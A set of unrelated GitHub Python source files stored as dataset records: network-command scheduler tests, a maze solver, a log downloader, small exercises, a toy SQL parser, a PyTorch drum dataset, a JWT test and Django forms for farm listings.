schedule.run_all()\n\n # expected command result is a list\n result = send_wedged_msg(self.addr)\n # print(result)\n self.assertEqual([], result)\n\n\nclass NetCmdTests(unittest.TestCase):\n \"\"\"\n Slightly better tests (than NetCmdTest) using schedule.\n \"\"\"\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_run_net_cmd_false(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/false']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n\n def test_get_net_cmds_bad_path(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n bad_dir = '/tmp/foobar/'\n cmd = ['/tmp/foo0-down.sh']\n 
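A minimal standalone sketch of the schedule-library pattern these tests exercise (separate from the test suite, with made-up job names): a job that returns schedule.CancelJob is dropped from schedule.jobs after its first run, while ordinary jobs stay registered.

import schedule

def one_shot():
    print("runs once")
    return schedule.CancelJob      # returning this sentinel unschedules the job

def repeating():
    print("stays scheduled")

schedule.every().second.do(one_shot)
schedule.every().second.do(repeating)
schedule.run_all()                 # run every registered job now, ignoring their delays
assert len(schedule.jobs) == 1     # only repeating() is still scheduled
schedule.clear()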
self.assertFalse(os.path.isdir(bad_dir))\n res = get_net_cmds(bad_dir, 'fpn0', True)\n # print(cmd)\n self.assertIsNone(res)\n state, result, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n # print(result)\n\n def test_run_net_cmd_not_found(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/tuna']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n\n def test_run_net_cmd_up0(self):\n # expected command result is 'Success' so the return\n # result is actually <schedule.CancelJob>\n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', True)\n tj = every().second.do(mock_job)\n\n result = run_net_cmd(cmd)\n self.assertIsInstance(result, type)\n self.assertIn('CancelJob', str(result))\n\n def test_run_net_cmd_down0(self):\n # expected command result is 'Fail' so the return\n # result is the output of run_net_cmd()\n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', False)\n tj = every().second.do(mock_job)\n\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n self.assertEqual(ret, 1)\n","repo_name":"freepn/fpnd","sub_path":"test/test_sched_decorators.py","file_name":"test_sched_decorators.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":293,"dataset":"github-code","pt":"16"} +{"seq_id":"28330020234","text":"adj = []\ns = ['+++++++++++++++++++++++',\n 'S + + +',\n '+ +++ + ++++ + ++++++ +',\n '+ + + + + + +',\n '+ ++++++++ +++ + + ++++',\n '+ + + + + + ++',\n '++++ + +++ + +++++ + +',\n '+ + + + +',\n '+ ++++++ + ++++++ +++++',\n '+ + + +',\n '+++++++++++++++++++++F+']\n\nfor t in s:\n adj.append(list(t))\n\nprint(adj)\ncol = len(adj[0])\nrow = len(adj)\nprint('Row = %d' % row)\nprint('Column = %d' % col)\n\nqueue = []\n\n\ndef stringify(i, j):\n s = ''\n s = s + str(i) + '-' + str(j)\n return s\n\n\ndef maze():\n i = 0\n while i < len(adj):\n for j in range(len(adj[i])):\n print(adj[i][j], end=\" \")\n print()\n i += 1\n\n\ndef maze_solver(i, j):\n maze()\n print()\n print()\n # print('Remaining Path Options => %s' % queue)\n adj[i][j] = '.'\n count = 0\n record = []\n if adj[i + 1][j] == ' ':\n count += 1\n record.append(stringify(i + 1, j))\n\n if adj[i - 1][j] == ' ':\n count += 1\n record.append(stringify(i - 1, j))\n\n if adj[i][j + 1] == ' ':\n count += 1\n record.append(stringify(i, j + 1))\n\n if adj[i][j - 1] == ' ':\n count += 1\n record.append(stringify(i, j - 1))\n\n if adj[i + 1][j] == 'F':\n adj[i + 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i + 1, j))\n quit()\n\n if adj[i - 1][j] == 'F':\n adj[i - 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i - 1, j))\n quit()\n\n if adj[i][j + 1] == 'F':\n adj[i][j + 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j + 1))\n quit()\n\n if adj[i][j - 1] == 'F':\n adj[i][j - 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j - 1))\n quit()\n\n if count == 1:\n l = record[0].split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n if count > 1:\n queue.extend(record)\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n else:\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n\nprint('Initial Stage')\np = 0\nwhile p < len(adj):\n for q in range(len(adj[p])):\n if adj[p][q] == 'S':\n 
print('Fun Begins at (%d, %d)' % (p, q))\n maze_solver(p, q)\n else:\n pass\n\n p += 1\n","repo_name":"simon619/Maze-Solving-Using-Breadth-First-Search","sub_path":"SimonsMaze.py","file_name":"SimonsMaze.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70414991687","text":"import urllib.request\nimport os\nimport pathlib\nimport gzip\n\nimport setup as s\n\n# ##################################################################\n# pwaFileImport\n# ##################################################################\ndef pwaFileImport(webRetrieve=False, unzipfiles=True, maxFiles = 5):\n \"\"\"\n Import files froms website https://www.cs.huji.ac.il\n Logs (of real life) of set of job times.\n Retrieve file catalog : address setted in constant s.URL_CATALOG_PWA\n reads this file which contains the url addresses of the time files\n and each file is retreived in the folder FOLDER_ZIPPEDLOG,\n to be unzipped in the folder FOLDER_PWA\n input\n :param webRetrieve: True : retreive files from website.\n :param unzipfiles : True : unzip files from zippedLog folder to PWA folder\n :param maxFiles : number of files to retreive from website.\n use 0 to retreive all files\n \"\"\"\n tabFiles = []\n\n #-------------------------------\n # log directory\n # s.folder creates requested directories if not exists\n # curDir = os.path.abspath(os.curdir)\n #-------------------------------\n zipDir = s.folder(s.FOLDER_ZIPPEDLOG)\n logDir = s.folder(s.FOLDER_PWA)\n \n #-------------------------------\n # Web resource web --> zipDir\n #-------------------------------\n if webRetrieve:\n # read distant file\n fichierNom = s.URL_CATALOG_PWA # url of files log catalog \n req = urllib.request.Request(url=fichierNom) \n fichierId = urllib.request.urlopen(req)\n\n # put the list on a list tabFiles\n contentsLine = fichierId.readline().decode('utf-8')\n while contentsLine:\n tabFiles.append(contentsLine.rstrip(\"\\n\")) # erase \\n caracter from the string \n contentsLine = fichierId.readline().decode('utf-8')\n\n # close the file\n fichierId.close()\n \n # now i have my list of pwa gz logs\n n=0\n for file in tabFiles:\n n+=1\n if (n > maxFiles or maxFiles==0):\n break\n fileInfo = pathlib.Path(file)\n # destFile = os.path.join(zipDir, fileInfo.name)\n destFile = zipDir+\"/\"+fileInfo.name\n urllib.request.urlretrieve(file, destFile)\n print(\"file ========> \"+destFile+\" retrieved.\")\n\n if unzipfiles == True:\n unzipGZ(fileInfo.name, zipDir, logDir)\n# ##################################################################\n# unzipGZ\n# ##################################################################\ndef unzipGZ(fileNameGZ, fromDir, destDir):\n \"\"\"\n Unzip the file named fromDir+fileNameGZ\n in the folder destDir. 
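    A hypothetical call, reusing the NASA log name from the commented test lines at
    the bottom of this module and assuming "zippedLog" / "PWA" are the folder names
    behind s.FOLDER_ZIPPEDLOG and s.FOLDER_PWA:

        unzipGZ("NASA-iPSC-1993-3.1-cln.swf.gz", "zippedLog", "PWA")
        # reads zippedLog/NASA-iPSC-1993-3.1-cln.swf.gz and writes the
        # decompressed bytes to PWA/NASA-iPSC-1993-3.1-cln.swf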
\n \"\"\"\n #\n fromFile = fromDir+s.sepDir()+fileNameGZ\n destFile = destDir+s.sepDir()+fileNameGZ.rstrip(\".gz\")\n #\n print(\"Unzipping file %s in %s\" % (fromFile, destDir))\n #\n src = gzip.GzipFile(fromFile, 'rb')\n sRead = src.read()\n src.close()\n d = open(destFile, 'wb')\n d.write(sRead)\n d.close()\n print(\"Unzipped.\")\n\n# ##################################################################\n# pwaFileRead\n# ##################################################################\ndef pwaFileRead(fileName):\n \"\"\"\n Reads the log file according to the predefined format,\n to create an instance (set of times)\n called from matrix.py\n \"\"\"\n with open(fileName, 'r') as f:\n text = f.read()\n # END WITH \n times = []\n for line in text.split('\\n'):\n line = line.strip()\n if not(line) or line[0] == \";\":\n continue\n # END IF\n jobId, submitTime, waitTime, runTime, nbProc, avgCPUtime, mem, reqProc, reqTime, reqMem, status, uId, gId, appId, queueId, partitionId, precedingJob, timefromPrecedingJob = [float(x) for x in line.split()]\n if runTime != 0:\n # times += [runTime]\n times.append(runTime)\n # END IF\n # END FOR\n return times\n# ##################################################################\n# pwaFileChoice():\n# ##################################################################\ndef pwaFileChoice(chooseMode = None):\n \"\"\"\n finds the files contained in the \"FOLDER_PWA\" directory,\n and proposes to choose them, or not (for test instance creation).\n :Param chooseMode : None Asc for use the current files / 1 Always answer YES, 0 Always answer NO, \n Returns the list of selected files as a list files[]\n \"\"\"\n files = []\n logDir = s.folder(s.FOLDER_PWA)\n content = os.listdir(logDir)\n for item in content:\n if chooseMode == None:\n r = int(input(\"Use this file %s ? 
(1 yes 0 no) : \" % (item)))\n else:\n r=chooseMode\n # END IF \n if r == 1:\n files.append(logDir+s.sepDir()+item)\n # END IF\n # END FOR\n print(files)\n return files\n\n##TO TEST THIS SCRIPT\n##pwaFileImport(True, True)\n##logTimes = pwaFileRead(logFolder()+\"/NASA-iPSC-1993-3.1-cln.swf\")\n##print(logTimes)\n##pwaFileChoice()\n\n\n","repo_name":"fColas68/appCmax","sub_path":"pwa.py","file_name":"pwa.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15511874337","text":"# 常规写法 获取字符串中的数字\ns = 'shidi33d6662bb99fff6d5'\nfor i in s:\n # 判断当前字符是不是一个数字 TF\n if i.isnumeric():\n print(i)\n\n# 正则匹配\nimport re # 内置 不需要下载\n# findall(匹配规则,匹配内容) 返回形式是列表\nres = re.findall('\\d+',s)\nprint(res)\n\n\n","repo_name":"xiaoguiy/python-scrapy","sub_path":"10-正则(上)/上课代码/04-正则概述.py","file_name":"04-正则概述.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7402966182","text":"n=int(input())\r\np_list=[]\r\n\r\nfor i in range(n):\r\n w,h=map(int,input().split())\r\n p_list.append([w,h])\r\n \r\nfor i in p_list:\r\n grade=1\r\n for j in p_list:\r\n if i[0] < j[0] and i[1] < j[1]:\r\n grade+=1\r\n print(grade)","repo_name":"parkminji03/Study_kt","sub_path":"11.브루트포스/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25758875291","text":"# Importing libraries\nimport re\nimport storage as db\nimport sys\n\nstorage = db.storager()\n\n# Parser process:\n# Parsing words -- DONE!\n# Exit function -- DONE!\n# Create function -- DONE!\n# Insert function -- DONE!\n# Select function -- edit select in storager with order\n# Delete finction -- edit select in storager with condition\n\n# Function to parse words into commands and find command type if it is possible\ndef parse(self, words):\n command = re.findall(r'\\S+', words)\n print(command)\n command_type = command[0]\n command_type = command_type.upper()\n symbols = ['(', ')', ',', '.', ';']\n\n # Find command type and arguments or print command error\n if command_type not in Parser.COMMANDS:\n print(f\"Command '{command_type}' not found!\")\n command_exec = 0\n\n elif command_type == 'EXIT': \n print('Stopping program...')\n Parser.exit_command = True\n sys.exit() \n\n elif command_type == 'CREATE':\n table_name = command[1]\n if re.match(Parser.NAMES, table_name) and table_name.upper() not in Parser.COMMANDS and table_name.upper() not in Parser.SPECIAL_WORDS:\n columns = []\n i = 2\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n # Searching indexing columns and mark them to indexed_flag = True\n while i < len(command):\n if i + 1 < len(command):\n indexed_word = command[i + 1]\n if indexed_word.upper() == 'INDEXED':\n indexed_flag = True\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += int(indexed_flag)\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += 1\n print(columns)\n command_exec = storage.create_db(table_name, columns)\n else:\n print('Invalid table name!')\n\n elif command_type == 
'INSERT':\n values = []\n i = 2\n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n values.append(command[i])\n i += 1\n print(values)\n command_exec = storage.insert_db(table_name, values)\n\n elif command_type == 'SELECT':\n columns = []\n condition = []\n order = []\n i = 1\n # Detecting selection columns\n from_pos = 0\n where_pos = 0\n order_pos = 0\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n if command[i].upper() == 'FROM':\n from_pos = i\n if command[i].upper() == 'WHERE':\n where_pos = i\n if command[i].upper() == 'ORDER_BY':\n order_pos = i\n i += 1\n\n for i in range(1, from_pos):\n columns.append(command[i])\n table_name = command[from_pos + 1]\n if where_pos != 0 and order_pos != 0:\n for i in range(where_pos + 1, order_pos):\n condition.append(command[i])\n elif where_pos != 0 and order_pos == 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n if order_pos != 0:\n for i in range(order_pos + 1, len(command)):\n order.append(command[i])\n print(f\"t_n {table_name}\")\n print(f\"columns {columns}\")\n print(f\"condition {condition}\")\n print(f\"order {order}\")\n command_exec = storage.select_db(table_name, columns, condition, order)\n\n elif command_type == 'DELETE':\n condition = []\n where_pos = 0\n i = 2\n\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n \n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n print(f\"table_name -- {table_name}\")\n print(f\"len(command) -- {len(command)}\")\n print(f\"i -- {i}\")\n while i < len(command):\n if command[i].upper() == 'WHERE':\n where_pos = i\n i += 1\n if where_pos != 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n print(f\"condition -- {condition}\")\n command_exec = storage.delete_db(table_name, condition)\n \n return command_exec\n\n\n# Parser class\nclass Parser:\n NAMES = r\"[a-zA-Z][a-zA-Z0-9_]*\"\n COMMANDS = {'CREATE', 'INSERT', 'SELECT', 'DELETE', 'EXIT'}\n SPECIAL_WORDS = {'INDEXED', 'INTO', 'FROM', 'WHERE', 'ORDER_BY'}\n\n def __init__(self):\n input_command = ''\n input_accept = True\n exit_command = False\n print('Use \"EXIT\" command to stop this program')\n\n # Command input\n while not exit_command:\n 
while input_accept:\n input_command += ' ' + input('>>').strip()\n if ';' in input_command:\n for words in input_command.split(';'):\n if words:\n #print(words)\n parse(self, words)\n input_accept = False\n input_accept = True\n\n #command = re.findall(r'\\S+', words)\n #print(command)\n\nif __name__ == '__main__':\n parser = Parser()\n","repo_name":"AntoshaGodx/aaf-labs-2021","sub_path":"shevchenko_fi-92_kozlovska_fi-92/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37415723791","text":"\"\"\"2427. Number of Common Factors\"\"\"\n\n\nclass Solution:\n def commonFactors(self, a: int, b: int) -> int:\n count = 1\n i = 2\n\n while i <= min(a, b):\n if a % i == 0 and b % i == 0:\n count += 1\n i += 1\n\n return count\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/2427.py","file_name":"2427.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2216404079","text":"from torch.utils.data import Dataset\nimport numpy as np\n\n\nclass DrumDataset(Dataset):\n def __init__(self, data_list):\n self.data_list = data_list\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n curr_data = self.data_list[idx]\n skel = curr_data['skeleton']\n note = curr_data['note']\n vel = curr_data['vel']\n mt = curr_data['mt']\n tempo = curr_data['tempo']\n fname = curr_data['midi_f']\n genre = curr_data['genre']\n note_density_idx = curr_data['note_density_idx']\n vel_contour = curr_data['vel_contour']\n time_contour = curr_data[\"time_contour\"]\n # time_contour =\n\n # skel = skel[ np.newaxis, :]\n # note = note[np.newaxis, :]\n # vel = vel* 127 // 4\n\n # range1 = 2\n # range2 = 100\n\n # mt = (range2 * (mt + (range1 /2))) / range1 - (range2/2) + 50\n\n # vel = vel / 32\n # mt = mt / 100\n\n n_inst = np.sum(note, 0)\n n_inst[n_inst > 1] = 1\n\n n_inst = int(np.sum(n_inst)) - 1\n\n return {\n \"skel\": skel,\n \"note\": note,\n \"vel\": vel,\n \"mt\": mt,\n \"tempo\": tempo,\n \"fname\": fname,\n \"genre\": genre,\n \"note_density_idx\": note_density_idx,\n \"vel_contour\": vel_contour,\n # \"vel_accent\": vel_accent,\n \"time_contour\": time_contour,\n \"n_inst\": n_inst\n # \"time_mode\": time_mode\n # \"deco\": deco\n }\n","repo_name":"kyungyunlee/PocketVAE","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"34552216105","text":"def def_casos(T):\r\n casos_valor = []\r\n casos_keys = []\r\n for i in range(T):\r\n value = int(input(f\"Ingrese #Caso {i+1}: \"))\r\n while(value>200 or value<0):\r\n value = int(input(\"Porfavor, ingrese un #Caso entre 0 y 200: \")) \r\n if(value>=0 and value<=200):\r\n casos_valor.append(value)\r\n casos_keys.append(f\"Caso #{i+1}\")\r\n\r\n return casos_keys, casos_valor\r\n\r\ndef ciclo_bleatrix(N, casos_keys):\r\n \"\"\"\r\n x = []\r\n for i in range(0,10):\r\n x.append(i)\r\n \"\"\"\r\n validador = [0,1,2,3,4,5,6,7,8,9]\r\n valores_keys = []\r\n print(N)\r\n\r\n for valor in N:\r\n i=0\r\n compara = []\r\n while((compara!=validador)):\r\n i+=1\r\n x = valor * i\r\n for digits in str(x):\r\n compara.append(int(digits))\r\n compara = list(dict.fromkeys(compara))\r\n compara.sort()\r\n if(compara == validador):\r\n valores_keys.append(x)\r\n 
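A compact standalone restatement of the check this loop performs (not part of the script above; it swaps the sorted-list comparison for a set and stops as soon as all ten digits have appeared among the running multiples):

def last_number_named(n):
    if n == 0:
        return None                          # 0, 0, 0, ... never covers the digits -> "INSOMNIA"
    seen = set()
    current = 0
    while len(seen) < 10:
        current += n
        seen.update(int(d) for d in str(current))
    return current

# last_number_named(2) -> 90, last_number_named(1692) -> 5076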
break\r\n elif((valor==0)):\r\n valores_keys.append(\"INSOMNIA\")\r\n break\r\n\r\n return dict(zip(casos_keys, valores_keys))\r\n \r\n\r\nif __name__ == \"__main__\":\r\n T = int(input(\"Introducir cantidad de casos a probar: \"))\r\n while(T is None or T>100 or T<1):\r\n T = int(input(\"Porfavor, ingrese un valor entre 1 y 100: \"))\r\n\r\n T_par = def_casos(T)\r\n print(ciclo_bleatrix(T_par[1], T_par[0]))\r\n ","repo_name":"FrancoTruffa/technicaltest","sub_path":"exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36707527496","text":"class Solution:\n def add(self, a: int, b: int) -> int:\n \"\"\"\n 不用加法运算做加法\n :param a:\n :param b:\n :return:\n 复杂度分析:时间复杂度O()\n \"\"\"\n x = 0xffffffff\n a = a & x\n b = b & x\n while b != 0:\n # a = a ^ b\n # b = (a & b) << 1 & x\n # 上面和下面的写法不同,计算结果也不相同,并排写法能同时运算结果,互不影响,分别计算非进位和和进位和\n a, b = (a ^ b), (a & b) << 1 & x\n print(\"a:{}\".format(a))\n print(\"b:{}\".format(b))\n return a if a <= 0x7fffffff else ~(a ^ x) # 若补码 a 为负数( 0x7fffffff 是最大的正数的补码 ),需执行 ~(a ^ x) 操作,将补码还原至 Python 的存储格式,~(a ^ x) 是将 32 位以上的位取反,1 至 32 位不变。\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.add(a=1, b=2))","repo_name":"Cecilia520/algorithmic-learning-leetcode","sub_path":"cecilia-python/剑指offer/chapter-7/Add.py","file_name":"Add.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"24850120477","text":"\"\"\"\n创建csv对象\ncsv.writer(fileobj)\n放入一个可迭代类型对象,写在一行,每一个元素是一列\ncsv.writerow(iterable)\n\n放入一个可迭代类型的元素,这个元素中的每一个子元素也必须可迭代\n每一个子元素占一行,子元素又会被拆开占据多列,长度取决于自身\ncsv.writerows(Iterable(Iterable))\n\n\"\"\"\nimport csv\n\n# 创建流对象\nfile = open(\"demo07.csv\", mode=\"w\", encoding=\"utf-8\")\n# 创建csv对象\ncsv_writer = csv.writer(file)\n# 写入内容\ncsv_writer.writerow([\"a\", \"b\", \"c\", \"d\", \"e\"])\n\n# csv_writer.writerows([[1, 2, 3], \"world\", \"say\", \"byebye\"])\n# 关闭流\nfile.close()\n","repo_name":"xvjingcheng/superman","sub_path":"千峰的每天/第十三天12.27/代码/Day13/07.csv写入文件.py","file_name":"07.csv写入文件.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23870524793","text":"#!/bin/env python3\nimport jwt\n\nfrom cryptography.x509 import load_pem_x509_certificate\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\n\npayload_data = {\n \"iss\": \"0d674da4ac7611eda8f78f77fa521b6e\"\n}\n\n# key_file = open('server.key', 'rb+')\n# private_bytes = key_file.read()\n# private_key = serialization.load_pem_private_key(\n# private_bytes, None, backend=default_backend()\n# )\n# cert_file = open('server.crt', 'rb+')\n# cert_str = cert_file.read()\n# cert_obj = load_pem_x509_certificate(cert_str)\n# public_key = cert_obj.public_key()\n# token = jwt.encode(payload_data, private_key, algorithm=\"RS256\")\n# print(jwt.decode(token, public_key, algorithms=['RS256', ]))\n\nmy_secret = 'guest'\n\ntoken = jwt.encode(\n payload=payload_data,\n key=my_secret,\n algorithm=\"HS256\"\n)\nprint(token)\n\n# print(jwt.decode(token, key=my_secret, algorithms=['HS256', 
]))\n","repo_name":"relaypro-open/dog_api_python","sub_path":"src/jwt_test.py","file_name":"jwt_test.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19215730048","text":"from django import forms\nfrom djmoney.forms import MoneyField\nfrom django.forms import ModelForm, Form\n\nfrom .models import Fazenda, FazendaMedia\nimport re\n\nestados = (('',''),('AC','Acre AC'),('AL','Alagoas AL'),('AP','Amapá AP'),\n ('AM','Amazonas AM'),('BA','Bahia BA'),('CE','Ceará CE'),\n ('DF','Distrito Federal DF'),('ES','Espírito Santo ES'),\n ('GO','Goiás GO'),('MA','Maranhão MA'),('MT','Mato Grosso MT'),\n ('MS','Mato Grosso do Sul MS'),('MG','Minas Gerais MG'),('PA','Pará PA'),\n ('PB','Paraíba PB'),('PR','Paraná PR'),('PE','Pernambuco PE'),('PI','Piauí PI'),\n ('RJ','Rio de Janeiro RJ'),('RN','Rio Grande do Norte RN'),\n ('RS','Rio Grande do Sul RS'),('RO','Rondônia RO'),('RR','Roraima RR'),\n ('SC','Santa Catarina SC'),('SP','São Paulo SP'),('SE','Sergipe SE'),\n ('TO','Tocantins TO'))\n\nculturas = (('Lavoura','Lavoura'),('Pecuária','Pecuária'),('Dupla Aptidão','Dupla Aptidão'))\n\nclass FazendaForm(ModelForm):\n class Meta:\n model = Fazenda\n fields = ('nome', 'municipio', 'estado', \n 'area_total', 'area_aberta',\n 'cultura', 'infra', 'maquinario',\n 'local_ref', 'coordenada', 'valor',\n 'obs', 'encaminhado', 'oferta')\n\n nome = forms.CharField(label='nome', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n municipio = forms.CharField(label='municipio', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'})) \n\n estado = forms.CharField(label='estado', widget=forms.Select({\n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=estados))\n\n area_total = forms.IntegerField(label='area_total',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n area_aberta = forms.IntegerField(label='area_aberta',widget=forms.NumberInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n cultura = forms.CharField(label='cultura', widget=forms.Select(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'},\n choices=culturas))\n\n infra = forms.CharField(label='infra', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n maquinario = forms.CharField(label='maquinario', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4'}))\n\n local_ref = forms.CharField(label='local_ref', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n coordenada = forms.CharField(label='coordenada', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n \n valor = forms.Form('valor',)\n\n obs = forms.CharField(label='obs', widget=forms.Textarea(\n attrs={ \"autocomplete\":\"off\", \n \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2',\n 'cols': '30',\n 'rows': '4' }))\n \n encaminhado = 
forms.CharField(label='encaminhado', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n oferta = forms.CharField(label='oferta', widget=forms.TextInput(\n attrs={ \"autocomplete\":\"off\", \"style\": \"font-size: large\",\n 'class':'form-control mr-sm-2'}))\n\n\nclass UploadMedia(forms.Form):\n class Meta:\n model = FazendaMedia\n fields = ('imagem', 'video', 'audio')\n\n imagens = forms.FileField(label='imagem', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True,}))\n \n videos = forms.FileField(label='video', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n audios = forms.FileField(label='audio', required=False, \n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\nclass SearchForm(forms.Form):\n \n estado = forms.ChoiceField(\n widget=forms.Select(attrs={'class':'form-control',}), #'style':r'padding-left: calc(50% - 1em)' Para momdile\n choices=estados, \n initial=\"\",\n required=False)\n \n municipio = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete':'off',}),\n required=False)\n\n area_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}), \n required=False)\n\n area_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',\n 'oninput':\"this.form.range_area_max.value=this.value\"}), \n required=False)\n \n valor_min = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2',\n 'autocomplete': 'off',}),\n required=False)\n\n valor_max = forms.CharField(\n widget=forms.TextInput(attrs={'class':'form-control mr-sm-2', \n 'autocomplete': 'off',}),\n required=False,\n )","repo_name":"gconelhero/Fazendas","sub_path":"cadastro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 